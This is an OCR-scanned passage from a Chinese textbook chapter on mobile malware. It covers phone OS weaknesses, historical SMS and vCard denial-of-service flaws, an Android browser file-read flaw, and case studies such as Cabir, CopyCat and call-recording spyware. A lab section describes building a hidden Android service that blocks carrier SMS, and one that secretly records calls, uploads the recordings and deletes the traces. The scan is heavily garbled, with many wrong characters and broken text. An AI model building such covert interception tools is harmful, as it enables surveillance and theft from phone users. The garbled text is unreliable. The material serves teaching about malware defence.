几乎 绝望 的 时 候 , 智 能 手机 PalmPre 和 其 下 一 代 操 作 系 统 WebOS 的 出 现 , 使 Palm 又 重 现 
生机 。 但 是 好 景 不 长 ,尽管 WebOS 在 娱乐 性 以 及 人 机 交互 方面 都 有 不 少 的 进步 ,并 且 有 着 
鲜明 的 特色 ,但 是 随 着 几 款 没有 竞争 力 的 产品 退出 市 场 后 表现 平平 ,最终 被 交易 到 了 惠普 手 
中 ,但 是 在 惠普 手中 并 没有 多 少 起 色 。 惠 普 在 2011 年 表示 ,将 不 再 继续 运营 WebOS 系统 
设备 业务 。 

7. 黑 每 系统 

RIM 黑 每 曾经 非 背 风行 ,依靠 全 键盘 的 配置 .对 邮件 的 管理 .出 色 的 用 户 体验 、 安 全 性 
等 方面 的 领先 ,是 不 少 用 户 的 首选 。 不 过 如 今 RIM 智能 手机 的 市 场 份额 也 不 断 地 被 竞争 对 
手 苹 果 iPhone 和 谷歌 Android 系统 手机 符 食 。 黑 每 特色 全 键盘 在 这 个 触摸 屏 当 道 的 时 代 
显得 格格 不 入 ,而 推出 了 全 触 屏 与 键盘 结合 等 尝试 后 ,RIM 依然 没有 摆脱 股价 不 断 下 中 的 


6.2.2 手机 操作 系统 的 弱点 


移动 终端 操作 系统 具有 很 多 和 普通 计算 机 操作 系统 相似 的 弱点 。 不 过 ,其 最 大 的 弱 
点 还 是 在 于 移动 终端 比 现 有 的 台式 机 更 缺乏 安全 措施 。 人 们 已 经 对 台式 机 的 安全 性 有 
了 一 定 的 了 解 ,而且 大 部 分 普通 PC 操作 系统 本 身 也 市 有 一 定 的 安全 措施 ,已 经 被 设计 成 
能 抵抗 一 定 程度 攻击 的 系统 。 因 此 普通 PC 上 的 安全 措施 ,使 它 受 到 安全 威胁 的 可 能 大 
为 减少 。 

移动 终端 操作 系统 就 不 同 了 , 它 的 设计 人 员 从 一 开始 就 没有 太 多 的 空间 来 考虑 操作 
系统 的 安全 问题 ,而 且 ,移动 终端 操作 系统 也 没有 像 PC 操作 系统 那样 经 过 严格 的 测试 ， 
甚至 在 国际 通用 的 信息 安全 评估 准则 (ISO 15408) 中 ,都 没有 涉及 移动 终端 操作 系统 的 
;eo 

移动 终端 操作 系统 的 弱点 主要 体现 在 以 下 几 个 方面 。 

(1) 不 支持 任意 的 访问 控制 (Discretionary Access Control,DAC) ,也 就 是 说 , 它 不 能 区 
分 一 个 用 户 同 男 一 个 用 户 的 个 人 私密 数据 。 

(2) 不 具备 审计 能 力 。 

(3) 缺少 通过 使 用 身份 标示 符 或 者 身份 认证 进行 重用 控制 的 能 力 。 


174 计算 机 病毒 与 恶意 代码 一 一 原理 、 技 术 及 防范 (第 4 版 ) 


(4) 不 对 数据 完整 性 进行 保护 。 

(5) 即使 部 分 系统 有 密码 保护 ,恶意 用 户 仍 然 可 以 使 用 调试 模式 轻 匈 得 到 他 人 的 密码 ， 
或 者 使 用 类 似 PalmCrypt 这 样 的 简单 工具 得 到 密码 。 

(6) 在 密码 锁定 的 情况 下 ,移动 终端 操作 系统 仍然 允许 安装 新 的 应 用 程序 。 

移动 终 闪 操 作 系 统 的 这 些 弱 点 危及 设备 中 的 数据 安全 ,尤其 是 当 用 户 丢 失 终 闪 设 备 后 ， 
一 旦 被 恶意 用 户 得 到 了 ,他们 就 可 以 训 无 阻碍 地 查看 设备 中 的 个 人 机 密 数 据 。 如 果 身 边 的 
人 有 机 会 接近 设备 ,他 们 就 能 修改 其 中 的 数据 。 而 终端 设备 的 主人 对 其 他 未 授权 用 户 的 查 
看 一 无 所 知 ,即使 发 现 有 人 改动 了 数据 ,也 没有 任何 证 据 表 明 是 谁 改 动 的 。 也 就 是 说 ,移动 
终端 操作 系统 没有 提供 任何 线索 帮助 发 现 和 人 侵 和 进行 人 侵 退 踩 。 

移动 终端 设备 相对 于 普通 PC 来 说 ,又 小 又 轻 , 容 易于 失 。 一 旦 丢失 ,这 些 设备 又 缺少 
通过 使 用 身份 标示 符 或 者 身份 认证 进行 使 用 控制 的 能 力 , 任 何 失 到 该 设备 的 人 都 可 以 看 到 
其 中 的 个 人 信息 。 如 果 其 中 还 包含 与 公司 机 密 主 题 相 关 的 客户 通讯 录 或 者 电子 邮件 信息 ， 
那么 这 些 数 据 落 入 他 人 之 手 , 就 有 可 能 给 整个 公司 市 来 严重 的 损失 。 

现在 虽然 有 一 些 移动 终端 设备 采用 了 机 密 措 施 来 保护 其 中 的 重要 数据 ,但 是 受到 设备 
的 能 量 和 运算 能 力 的 限制 ,加 密 强 度 并 不 大 ,非常 容易 被 破解 。 


6.3 移动 终端 恶意 代码 关 健 技术 


移动 终端 恶意 代码 是 一 种 以 移动 终端 设备 为 攻击 目标 的 程序 , 它 以 手机 或 PDA 为 感 
染 对 象 ,以 无 线 通 信 网 络 和 计算 机 网 络 为 平台 ,通过 发 送 恶 意 短 信 等 形式 ,对 终端 设备 进行 
攻击 ,从 而 造成 设备 状态 异常 。 

随 着 GPRS 3G 技术 的 发 展 , 以 及 手机 硬件 设备 的 迅速 升级 ,手机 趋向 一 台 小 型 计算 
机 ,有 计算 机 上 的 恶意 软件 就 会 有 手机 上 的 恶意 代码 。 当 前 ,手机 恶意 代码 已 经 成 为 新 的 恶 
意 代 码 人 研究 热点 。 


6.3.1 移动 终端 恶意 代码 传播 途径 


目前 ,移动 终端 恶意 代码 主要 通过 几 种 途径 进行 攻击 : 终端 一 终端 、 终 端 一 网 关 一 终 
端 \.PC( 计 算 机 ) 一 终端 。 

终端 一 终端 : 手机 直接 感染 手机 ,其 中 间 桥 染 诸 如 蓝牙 ,红外 等 无 线 连接 。 通 过 该 途径 
传播 的 最 著名 的 病毒 实例 就 是 国际 病毒 编写 小 组 *29A” 发 布 的 Cabir 蠕虫 。Cabir 蠕虫 通 
过 手机 的 蓝牙 设备 传播 ,使 染 毒 的 蓝牙 手机 通过 无 线 方式 搜索 并 传染 其 他 蓝牙 手机 。 

终端 一 网 关 一 终端 : 手机 通过 发 送 含 毒 程序 或 数据 给 网 关 ( 如 WAP 服务 大 、 短 信和 平台 
等 ) ,网 关 染 毒 后 再 把 恶意 代码 传染 给 其 他 终端 或 者 干扰 其 他 终 问 。 典 型 的 例子 是 VBS. 
Timofonica 病毒 , 它 的 破坏 方式 是 感染 短信 平台 后 ,通过 短信 平台 向 用 户 发 送 垃圾 信息 或 
广告 。 

PC( 计 算 机 ) 一 终端 : 恶意 代码 先 寄 特 在 普通 计算 机 上 , 当 移 动 终端 连接 染 毒 计算 机 
时 ,恶意 代码 再 传染 给 移动 终端 。 
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6.3.2 移动 终端 恶意 代码 攻击 方式 


从 攻击 对 象 来 分 , 现 有 移动 终端 恶意 代码 也 可 以 划分 为 如 下 类 型 。 

(1) 短信 攻击 : 主要 是 以 “恶意 短信 ”的 方式 发 起 攻击 。 

(2) 直接 攻击 手机 : 直接 攻击 相 邻 手机 ,Cabir 蠕虫 就 是 这 种 恶意 代码 。 

(3) 攻击 网 关 : 控制 WAP 或 短信 平台 ,并 通过 网 关 问 手机 发 送 垃圾 信息 ,干扰 手机 用 
户 ,甚至 导致 网 络 运行 瘫痪 。 

(4) 攻击 漏洞 : 攻击 字符 格式 漏洞 .智能 手机 操作 系统 漏洞 ,应 用 程序 运行 环境 漏洞 和 
应 用 程序 漏洞 。 

(5) 木马 型 恶意 代码 : 利用 用 户 的 蚊 忽 ,以 合法 身份 侵 人 移动 终端 ,并 伺机 和 锚 取 资料 的 
恶意 代码 。 例 如 ,Skulls 恶意 代码 是 典型 的 特洛伊 木马 。 


6.3.3 移动 终端 恶意 代码 的 生存 环境 


在 手机 和 PDA 流行 的 初期 ,虽然 也 在 不 少 移动 终端 设备 上 发 现 了 安全 问题 ,但 真正 意 
义 上 的 恶意 代码 却 非常 罕见 ,这 并 不 是 因为 没有 人 愿意 写 ,而 是 存在 着 不 少 技术 困难 。 早 期 
的 手机 环境 的 弱点 如 下 。 

1. 系统 相对 封闭 

移动 终端 操作 系统 是 专用 操作 系统 ,不 对 普通 用 户 开 放 ( 不 像 计 算 机 操作 系统 ,容易 学 
习 .调试 和 程序 编写 ) ,而 且 它 所 使 用 的 芯片 等 硬件 也 都 是 专用 的 ,平时 很 难 接触 到 。 

2. 创作 空间 狭 窒 

移动 终端 设备 中 可 以 " 写 ” 的 地 方太 少 。 例 如 ,在 初期 的 手机 设备 中 ,用 户 是 不 可 以 向 手 
机 里 面 写 数据 的 ,唯一 可 以 保存 数据 的 只 有 SIM 卡 。 这 么 一 点 容量 想 要 保存 一 个 可 以 执行 
的 程序 非常 困难 ,况且 保存 的 数据 还 要 绕 过 SIM 卡 的 格式 。 

3. 数据 格式 单调 


以 初期 的 手机 设备 为 例 , 这 些 设备 接收 的 数据 基本 上 都 是 文本 格式 数据 。 文 本 格式 是 
计算 机 系统 中 最 难 附 融 恶 意 代 码 的 文件 格式 。 同 理 , 在 移动 终端 中 ,恶意 代码 也 很 难 附加 在 
文本 内 容 上 进行 传播 。 

但 是 , 随 着 时 代 的 发 展 ,新 的 恶意 代码 .蠕虫 的 威胁 会 不 断 出 现 , 这 就 有 可 能 影响 到 众多 
手持 设备 ,日 益 普 及 的 移动 数据 业务 成 为 这 些 恶 意 代 码 滋生 蔓延 的 温床 。 在 今天 越 来 越 多 
的 谈论 手机 短信 、 手 机 邮件 .手机 铃声 及 图 片 的 时 候 , 随 之 而 来 的 是 人 们 将 会 看 到 一 些 应 用 
程序 及 插件 也 随 之 出 现 。 这 些 外 来 程序 使 移动 终端 设备 像 计 算 机 一 样 面 临 恶意 代码 的 威 
胁 ,一 些 恶 意 代码 可 以 利用 手机 芯片 程序 的 缺陷 ,对 手机 操作 系统 进行 攻击 。 

特别 是 随 着 移动 终端 行业 的 快速 发 展 ,移动 终端 不 多 见 的 局 面 已 经 开始 发 生变 化 ,这 主 
要 在 于 在 新 设备 的 设计 制造 过 程 中 引进 了 一 些 新 技术 。 特 别 是 由 于 以 下 原因 ,为 移动 终端 
恶意 代码 的 产生 ,保存 和 传播 都 创造 了 条 件 。 

(1) 类 Java 程序 的 应 用 。 类 Java 程序 大 量 运 用 于 移动 终端 设备 ,使 得 编写 用 于 移动 终端 
上 的 程序 越 来 越 容易 ,一 个 普通 的 Java 程序 员 其 至 都 可 以 编写 出 能 传播 的 恶意 代码 程序 。 

(2) 操作 系统 相对 稳定 。 基 于 Android 10S、WPhone 和 Black Berry 的 操作 系统 的 终 冰 设 
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备 不 断 扩大 ,同时 设备 使 用 的 芯片 (如 Intel 的 Strong ARMD) 等 硬件 也 不 断 固定 下 来 ,使 它们 有 
了 比较 标准 的 操作 系统 ,并 且 , 这 些 操作 系统 厂商 甚至 连 世 片 都 对 用 户 开 放 API, 并 且 鼓 励 在 
其 上 做 开发 工作 ,这 样 在 方便 的 同时 ,也 为 恶意 代码 编写 者 提供 了 便利 ,破坏 者 只 需 查阅 芯片 
厂商 或 者 操作 系统 厂商 提供 的 手册 就 可 以 编写 出 运行 于 移动 终端 上 的 恶意 代码 。 

(3) 容量 不 断 扩 大 。 移 动 终端 设备 的 容量 不 断 扩大 , 既 增 加 了 其 功能 ,也 使 得 恶意 代码 
有 了 藏身 之 地 。 例 如 ,新 型 的 智能 手机 都 有 比较 大 的 容量 ,甚至 能 外 接 CF 卡 。 

(4) 数据 格式 多 媒体 化 。 移 动 终端 直接 应 用 、 传 输 的 内 容 也 复杂 了 很 多 ,从 以 前 只 有 文 
本 发 展 到 现在 支持 二 进 制 格式 文件 ,因此 恶意 代码 就 可 以 附加 在 这 些 文件 中 进行 传播 。 


6.3.4 移动 终端 设备 的 漏洞 


除了 操作 系统 的 漏洞 外 ,移动 终端 设备 本 身 的 漏洞 也 是 编制 恶意 代码 的 核心 技术 。 目 
前 为 止 ,曾经 被 恶意 代码 利用 的 漏洞 如 下 。 

1. PDU 格式 漏洞 

2002 年 1 月 ,荷兰 安全 公司 ITSX 的 研究 人 员 发 现 ,诺基亚 的 一 些 流行 型 号 的 手机 的 操 
作 系 统 由 于 没有 对 短信 的 PDU 格式 做 例外 处 理 , 存 在 一 个 Bug。 黑 客 可 以 利用 这 个 安全 漏 
洞 向 手机 发 送 一 条 160 个 字符 以 下 长 度 的 畸形 电子 文本 短信 息 使 操作 系统 前 溃 。 该 漏洞 主 
要 影响 诺基亚 3310、3330 和 6210 型 手机 。 

2. 特殊 字符 漏洞 

由 于 手机 使 用 范围 逐渐 扩大 ,中 国安 全 人 士 对 手机 、 无 线 网 络 的 安全 也 产生 了 了 兴 
2001 年 年 底 , 中 国安 全 组 织 Xfocus 的 研究 人 员 发 现 西门 子 35 系列 手机 在 处 理 一 些 特 殊 字 
符 时 存在 漏洞 ,将 直接 导致 手机 关机 。 

3. vCard 漏洞 

vCard 格式 是 一 种 全 球 性 的 MIME 标准 ,最 早 由 Lotus 和 Netscape 提出 。 该 格式 实现 
了 通过 电子 邮件 或 者 手机 来 交换 名 片 的 功能 。 诺 基 亚 的 6610、6210、6310 和 8310 等 系列 手 
机 都 支持 vCard, 但 是 其 6210 手机 被 证 实在 处 理 vCard 上 存在 格式 化 字符 串 漏洞 。 攻 击 者 
如 果 发 送 包含 格式 字符 串 的 vCard 恶意 信息 给 手机 设备 ,可 导致 SMS 服务 月 演 , 使 手机 被 
锁 或 重启 动 。 

4. Siemens 的 “%String” 漏 洞 

2003 年 3 月 ,西门子 35 和 45 系列 手机 在 处 理 短信 时 过 到 问题 。 当 接收 到 “% String” 
形式 的 短信 时 ,如 “%English” 西 门 子 手机 系统 会 以 为 是 要 更 改 操 作 系 统 语言 为 英文 ,从 而 
导致 在 查看 该 类 短信 时 死机 ,利用 这 一 点 很 容易 使 西门 子 这 类 手机 遭受 拒绝 服务 攻击 。 

5. Android 浏览 器 漏洞 

在 Android 2. 3 版 本 之 前 ,Android 浏览 套 在 下 载 payload. html 等 文件 时 不 会 告知 用 
户 , 而 是 自动 下 载 存 储 至 /sdcard/download。 使 用 JavaScript 让 这 个 payload 文件 自动 打 
开 ,使 浏览 硕 显 示 本 地 文件 。 用 户 在 这 种 本 地 环境 下 打开 一 个 HTML 文件 ,Android 浏览 
器 会 在 不 告知 用 户 的 情况 下 自动 运行 JavaScript。 而 在 这 种 本 地 环境 下 ,JavaScript 就 能 够 
读 取 文件 内 容 和 其 他 数据 。 
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该 缺陷 已 经 被 安全 网 站 海苔 安全 (Heise Security) 独立 证 实 , 所 以 要 警惕 可 疑 网 站 、 电 
子 邮 件 中 的 HTML 链接 或 Android 通知 栏 中 突然 弹出 的 下 载 。 在 手机 升级 到 Android 2. 3 系 
统 前 ,用户 必须 小 心 。 


6.4 Android 恶意 功能 开发 实验 


本 节 主 要 介绍 Android 系统 下 开发 恶意 功能 的 小 实验 。 通 过 该 实验 ,可 以 使 读者 了 解 
手机 恶意 代码 的 一 些 和 常用 方法 ,并 且 熟 悉 Android 模拟 需 的 应 用 以 及 Android 下 的 Java 编 
程 ， 为 本 章 的 综合 合 实 实验 打 好 基础 。 

本 部 分 使 用 的 软件 环境 如 下 。 

(1) 操作 系统 环境 : Windows 7。 

(2) 开发 工具 : Eclipse SDK 3.7. 2。 

(3) 开发 环境 : Android Development Toolkit 16. 0. 1 。 

(4) 测试 环境 : Android 模拟 大 4. 0. 3。 

本 节 主 要 完成 两 个 功能 的 测试 : 短信 拦截 和 电话 监听 。 这 两 个 功能 都 通过 Java 代码 


6.4.1 Android 短信 拦截 


Android 采用 广播 的 方式 接收 短信 ,本 市 的 程序 采用 拦截 广播 的 方式 来 实现 短信 拦截 。 
在 本 代码 中 ,开局 一 个 服务 来 监听 短信 的 广播 ,并 且 该 服务 拥有 最 高 优先 级 ,这 样 该 恶意 服 
务 将 最 早 获 得 短信 的 广播 。 在 拦截 到 短信 后 ,程序 忽略 由 10086 发 送 的 短信 ,不 让 广播 继续 
传播 下 去 ,导致 正常 的 短信 接收 应 用 无 法 获取 10086 短信 的 通知 。 

广播 有 两 种 不 同 的 类 型 : 普通 广播 (Normal Broadcasts) 和 有 序 广播 (Ordered 
Broadcasts)。 普 通 三 播 是 完全 异步 的 ,可 以 被 所 有 的 接收 者 接收 到 ,并 且 接 收 者 无 法 终止 
广播 的 传播 。 然 而 有 序 广播 是 按照 接收 者 声明 的 优先 级 别 , 被 接收 者 依次 接收 到 。 优 先 级 
别 声明 在 intent-filter 元 素 的 android:priority 属性 中 , 数 越 大 优先 级 别 越 高 , 取 值 范围 为 
一 1000 一 1000。 有 序 广播 的 接收 者 可 以 终止 广播 Intent 的 传播 ,广播 Intent 的 传播 一 旦 终 
止 , 后 面 的 接收 者 就 无 法 接收 到 广播 。 在 实现 的 代码 中 Context. sendBroadcast() 发送 的 是 
普通 广播 ,所 有 订阅 者 都 有 机 会 获得 并 进行 处 理 。Context. sendOrderedBroadcast() 发 送 的 
是 有 序 广播 ,系统 会 根据 接收 者 声明 的 优先 级 别 按 顺 序 逐 个 执行 接收 者 。 

本 代码 位 置 : 本 书 配 套 素材 目录 :\ in-class\ch-8\smsReceiver。 详 细 的 使 用 方法 如 下 。 

1. 安装 恶意 代码 程序 前 的 正常 情况 

在 模拟 器 环境 下 ,模拟 10086 号 码 从 发 送 台 发 送 短信 ,接收 端 能 够 正常 接收 到 短信 , 没 
有 被 拦截 (图 6-4) 。 

2. 运行 本 代码 后 

模拟 10086 从 发 送 平台 发 送 短信 , 收 不 到 任何 从 10086 发 送 的 短信 (图 6-5)。 尝 试用 其 
他 号 码 如 654321 发 送 , 则 可 以 接收 到 (图 6-6) 。 


178 计算 机 病毒 与 恶意 代码 一 一 原理 ,技术 及 防范 (第 4 版 ) 


[i problems | @ Javadoc | 区 Declaration | 国 Console [9 LogCat | 莲 Debug 


Telephony Actions 
Incoming number: 10086 
3 Voice 
加 SMS 
Message: test before installing the smsReceiver... 
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6-5 ”模拟 10086 发 的 短信 被 拦截 


654321 : 


Yestt test! 


Telephony Actlons 


Incoming number: 654321 


DD Voice 


(a) 模拟 654321 发 短信 


(b) 正常 接收 


6-6 ”模拟 654321 发 送 一 接收 
6.4.2 Android 电话 监听 


本 市 的 代码 通过 一 个 BroadcastReceiver 广播 接收 者 监听 手机 启动 状态 ,实现 开机 启 
动 。 因 为 是 电话 监听 需 , 不 能 让 用 户 察觉 ,所 以 不 能 有 软件 界面 ,主要 实现 的 功能 有 对 所 有 


第 6 章 ”移动 智能 终端 恶意 代码 179 


语音 通话 进行 录制 并 上 传 到 网 上 。 

Android 中 的 服务 类 似 于 Windows 中 的 服务 ,服务 一 般 没 有 用 户 操 作 界 面 , 它 运 行 于 
系统 中 不 容易 被 用 户 发 觉 ,可 以 使 用 它 开发 如 监控 之 类 的 程序 。 

本 代码 位 置 : 本 书 配套 素材 目录 :\ in-class\ch-8\PhoneListener。 详 细 的 使 用 方法 如 
下 (图 6-7) 。 


Telephony Actions 


Incoming number: 5554 


加 Voice 
© SMS 


6-7 Android 电话 监听 


在 Incoming number 后 面 输入 5554, 然 后 单 击 下 面 的 call 按钮 就 可 以 呼叫 了 ,当然 也 
可 以 另外 再 开 一 个 模拟 大 对 5554 进行 呼叫 。 

通话 结束 后 , 转 到 File Explorer 平台 上 和 查看 sdcard 中 是 否 有 想 要 的 录音 文件 ,有 就 代 
表 监 听 成 功 。 接 下 来 只 要 把 这 样 一 个 音频 文件 上 传 到 网 络 上 的 指定 位 置 ,然后 删除 sdcard 
上 的 音频 文件 (目的 是 隐藏 踪迹 ,防止 被 发 现 )。 这 样 就 实现 真正 的 监听 了 。 


6.5 移动 终端 恶意 代码 实例 


在 智能 手机 平台 上 发 挥 作用 的 恶意 代码 越 来 越 多 ,有 些 影 啊 非 常 大 。 在 此 ,给 出 一 些 具 
有 代表 性 的 手机 平台 恶意 代码 。 

1. Cabir 系列 病毒 

Cabir 是 一 个 使 用 蓝牙 传播 的 蠕虫 ,运行 于 支持 60 系列 平台 的 Symbian 手机 。 它 通过 
蓝牙 连接 复制 ,作为 包含 蠕虫 的 caribe. sis 文件 到 达 手 机 收 信箱 。 当 用 户 点 击 caribe. sis 并 
选择 安装 caribe. sis 文件 时 ,蠕虫 激活 并 开始 通过 蓝牙 寻找 新 的 手机 进行 感染 。 当 Cabir 里 
虫 发 现 另 一 个 蓝牙 手机 时 , 它 将 开始 回 其 发 送 感染 SIS 文件 ,并 锁定 这 个 手机 ,以 至 于 即使 
目标 离开 范围 时 它 也 不 会 寻找 其 他 手机 。Cabir 蠕虫 只 能 到 达 传 播 支持 蓝牙 且 处 于 可 发 现 
模式 的 手机 。 

将 手机 设 定 为 不 可 发 现 ( 隐 藏 ) 蓝 和 牙 模式 会 保护 手机 不 受 Cabir 蠕虫 侵害 。 但 是 一 旦 手 
机 感染 ,即使 用 户 答 试 从 系统 设置 使 蓝牙 不 可 用 ,病毒 也 会 试图 感染 其 他 系统 。 
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2. CopyCat 病毒 

CopyCat 病毒 通过 5 个 漏洞 传播 ,这 些 安 全 漏洞 主要 存在 于 Android 5. 0 或 更 早 版 本 
的 系统 中 ,这些 漏洞 已 被 发 现 和 修复 。 但 是 如 果 Android 用 户 在 第 三 方 应 用 市 场 下 载 应 用 ， 
它们 仍然 会 受到 攻击 。CopyCat 的 受害 者 数量 在 2016 年 4 一 5 月 期 间 达 到 顶峰 ,也 就 是 惊 
人 的 1400 万 个 。 

CopyCat 正如 其 名 一 样 ,是 通过 假冒 其 他 流行 应 用 来 欺骗 用 户 的 。 一 旦 用 户 下 载 了 这 
种 假冒 的 恶意 应 用 软件 , 它 就 会 收集 受 感染 设备 的 数据 ,下 载 ROOT 工具 来 ROOT 受 感 染 
的 设备 ,从 而 切断 其 安全 系统 。 

然后 ,CopyCat 就 可 以 下 载 各 种 虚假 应 用 ,支持 受 感 染 设 备 的 应 用 启动 程序 Zygote。 一 旦 
它 控制 住 Zygote, 它 就 能 知道 用 户 下 载 过 哪些 新 的 应 用 程序 以 及 打开 的 每 一 款 应 用 程序 。 

CopyCat 可 以 用 它 自己 的 推荐 者 ID(Referrer ID) 来 替换 受 感 染 设备 上 的 每 一 款 应 用 
程序 的 推荐 者 ID, 这 样 在 应 用 程序 上 弹出 的 每 一 个 广告 都 会 为 黑客 创造 收益 ,而 不 是 为 应 
用 开发 者 创造 广告 收益 。 每 隔 一 段 时 间 ,CopyCat 还 会 发 布 自己 的 广告 来 增加 收入 。 

Check Point 估计 ,有 近 490 万 个 虚假 应 用 被 安装 到 受 感染 的 设备 上 ,它们 能 够 显示 1 
亿 条 广告 。 仅 仅 两 个 月 ,CopyCat 就 可 以 为 黑客 赚 到 了 150 万 美元 的 广告 收入 。 

3. Judy 恶意 软件 

Judy 是 一 款 恶意 广告 点 击 软件 , 于 2017 年 被 发 现 。 据 称 超 过 40 个 Google Play 商店 
应 用 被 捆绑 了 该 恶意 代码 ,高峰 时 期 感染 3600 万 台 安 卓 设 备 , 而 且 躲 过 Google Play 的 审 
核 长 达 一 年 之 久 , 因 此 ,影响 力 非 常 大 。 

Judy 是 韩国 手 游 中 的 人 物 , 其 定位 偏 癌 女性 化 设计 ,大 多 为 化 妆 、 换 装 类 ,敏捷 、 益 智 
类 ,相关 主题 系列 共有 超过 40 款 应 用 ,拥有 大 量 用 户 。 这 些 被 感染 的 应 用 能 将 被 感染 设备 
的 信息 发 送 到 目标 网 页 ,从 而 在 后 台 进 行 广告 点 击 操作 ,为 攻击 者 创造 不 正当 收入 。 而 除了 
Judy 系列 手 游 外 ,该 恶意 代码 也 被 发 现存 在 于 其 他 几 个 应 用 程序 中 。 

经 过 研究 发 现 ,Judy 是 在 用 户 下 载 APP 至 手机 并 安装 后 ,与 传送 恶意 程序 的 服务 器 连 
接 , 借 此 成 功 躲 过 Google Play 的 安全 审查 。 该 恶意 软件 成 功 运行 后 ,就 会 将 感染 设备 的 信 
息 发 送 到 目标 页 面 ,并 进行 广告 点 击 操作 ,产生 大 量 非法 流量 ,为 攻击 者 创造 不 正当 收入 。 

4.“X 卧底 ”系列 木马 


在 2011 年 6 月初 闹 得 沸沸扬扬 的 “X 了 卜 底 ”是 一 球 锚 听 软 件 ,本 质 上 属于 黑客 间谍 软 
件 。“X 卧底 ?安装 后 不 会 启动 任何 图 标 ,也 不 会 给 用 户 任何 提示 ,一切 监听 行为 都 在 后 人 台 自 
动 完 成 ,用 户 根本 无 法 感知 。 该 软件 通过 以 下 方式 禄 取 隐 私 。 

(1) 当 通 话 时 ,木马 会 自动 监听 用 户 手 机 通话 并 自动 保存 录音 ,同时 读 取 用 户 的 通话 记 
录 、 短 信 等 内 容 。 

(2) 通话 完毕 后 ,木马 启动 上 传 程序 ,将 通话 录音 等 用 户 隐私 信息 联网 上 传 至 不 法 分 子 
搭建 的 服务 器 。 

(3) 除 偷 穷 隐私 外 ,Android 的 间谍 木马 还 包含 隐蔽 的 吸 费 代码 ,会 在 后 台 私 自发 送 扣 
费 短信 ,并 自动 删除 发 送 记 录 和 运营 商 回 执 短信 。 

.“ 白 卡 吸 费 魔 ”木马 
随 着 Android 水 货 手 机 的 日 益 走 俏 , 不 法 分 子 也 从 中 嗅 到 了 商业 利益 , 正 将 目光 慢 慢 转 
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移 到 水 贷 手 机 上 。2011 年 6 月 ,360 安全 中 心 接 到 了 部 分 用 户 反 馈 , 新 买 的 Android 手机 没 
用 几 天 就 少 了 几 十 元 的 话费 ,在 安装 安全 软件 后 ,该 软件 过 一 段 就 会 目 动 消失 。 

针对 用 户 出 现 的 问题 ,360 安全 专家 进行 分 析 后 得 知 ,这 些 用 户 的 手机 全 部 为 近期 购买 
的 新 手机 , 且 全 部 为 不 法 商家 用 测试 SIM 卡 刷 和 市 木马 ROM 的 “日 卡 机 ”, 其 内 置 了 一 组 
恶性 木马 ,分 工 合作 ,分 别 负责 和 卸载 安全 软件 . 盗 取 用 户 隐 私 以 及 狗 狂 恶意 扣 费 ,将 其 命名 为 
“日 卡 吸 费 历 ”。 

“日 卡 吸 费 魔 ” 系 列 木 马 的 主要 危害 如 下 。 

(1) 使 用 特殊 方式 刷 入 手机 ,用 户 无 法 删除 ,长 期 驻 留 后 台 消 耗 内 存 。 

(2) 利用 系统 漏洞 非法 获取 root 权限 ,使 手机 沦 为 “肉鸡 ”。 

(3) 恶意 删除 用 户 手机 中 的 安全 软件 。 

(4) 回 传 手机 中 包括 SIM 卡 信息 、 网 络 信 息 、 电 话 号 码 在 内 的 多 种 隐私 信息 。 

(5) 后 台 私 目 发 送 大 量 SP 吸 费 短信 并 删除 发 送 记 录 , 造 成 用 户 高 额 话费 损失 。 

(6) 私自 在 后 人 台 频 繁 联 网 回 传 用 户 隐私 以 及 接收 服务 器 指令 ,消耗 大 量 网 络 流量 。 

6. VBS. Timofonica 


移动 终端 恶意 代码 的 初次 登场 是 在 2000 年 6 月 , 它 就 是 著名 的 VBS. Timofonica。 这 
是 第 一 个 攻击 手机 的 病毒 。 该 病毒 通过 西班牙 的 运营 商 Telefonica 的 移动 系统 问 该 系统 内 
任意 发 送 骂 人 的 短 消 息 , 这 种 攻击 模式 类 似 于 邮件 炸弹 , 它 通过 短信 服务 运营 商 提 供 的 路 由 
可 以 向 任何 人 发 送 大 量 垃圾 信息 或 者 广告 ,在 大 众 眼 里 ,这 种 短信 炸弹 充其量 也 只 能 算是 恶 
作 剧 而 已 。 可 以 看 出 该 病毒 并 非 真 正 意 义 上 的 移动 终端 恶意 代码 ,因为 它 只 是 寄宿 在 普通 
的 计算 机 系统 中 。 

7. 和 否 钱 贪 禁 鬼 (Commwarrior) 

Commwarrior 病毒 也 就 是 彩信 病毒 。 也 许 此 病毒 对 广大 智能 用 户 来 说 并 不 阳 生 ,此 病 
毒 是 名 副 其 实 的 否 钱 机 妖 。 感 染 上 它 以 后 , 它 会 每 阳 几 秒 钟 就 偷偷 地 加 用 户 通 讯 录 中 的 号 
码 发 送 彩信 (不 管 是 移动 .联通 还 是 小 灵通 ) 。 彩 信 的 费用 和 发 彩信 的 频率 可 以 造成 个 人 的 
耳 接 资费 损失 。 

8. Skulls 恶意 代码 


Skulls 是 一 个 恶意 SIS 文件 木马 ,用 无 法 使 用 的 版 本 替换 系统 应 用 程序 ,以 致 除 电 话 功 
能 外 的 所 有 功能 都 无 法 使 用 。Skulls 安装 的 应 用 程序 文件 是 从 手机 ROM 解压 的 正常 
Symbian OS 文件。 但 是 由 于 Symbian OS 的 特征 ,将 它们 复制 到 手机 C 盘 中 正确 的 位 置 ， 
会 导致 关键 的 系统 应 用 程序 无 法 使 用 。 

如 果 安 装 Skulls, 会 导致 所 有 应 用 程序 图 标 都 被 蔡 换 为 骼 能 和 十 字 骨 头 的 图 片 ,而 且 图 
标 与 实际 程序 完全 不 相关 ,因此 手机 系统 应 用 程序 都 将 无 法 启动 。 这 基本 意味 着 如 果 安 装 
了 Skulls, 手 机 只 有 呼叫 和 应 答 可 以 使 用 ,所 有 需要 某 个 系统 应 用 程序 的 功能 ,如 SMS 和 
MMS 信息 、 网 页 浏览 和 照相 功能 都 将 无 法 使 用 。 

病毒 的 主要 文件 命名 为 Extended theme. SIS”, 目 称 为 Nokia 7610 智能 手机 的 主题 管 
理 需 ,病毒 作者 是 "Tee-222”。 

9. Lasco 系列 恶意 代码 

Lasco 也 是 一 个 使 用 蓝牙 传播 的 蠕虫 。 病 毒 感染 运行 于 支持 60 系列 平台 的 Symbian 
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手机 。Lasco 通过 蓝牙 连接 复制 ,作为 包含 蠕虫 的 velasco. sis 文件 到 达 手 机 收 信箱 。 当 用 
户 点 击 velasco. sis 并 选择 安 闭 时 ,蠕虫 激活 并 开始 通过 蓝牙 寻找 新 的 手机 以 进行 感染 。 当 
Lasco 蠕虫 发 现 另 一 个 蓝牙 手机 时 ,只 要 目标 手机 在 范围 内 , 它 就 开始 回 其 发 送 复制 的 
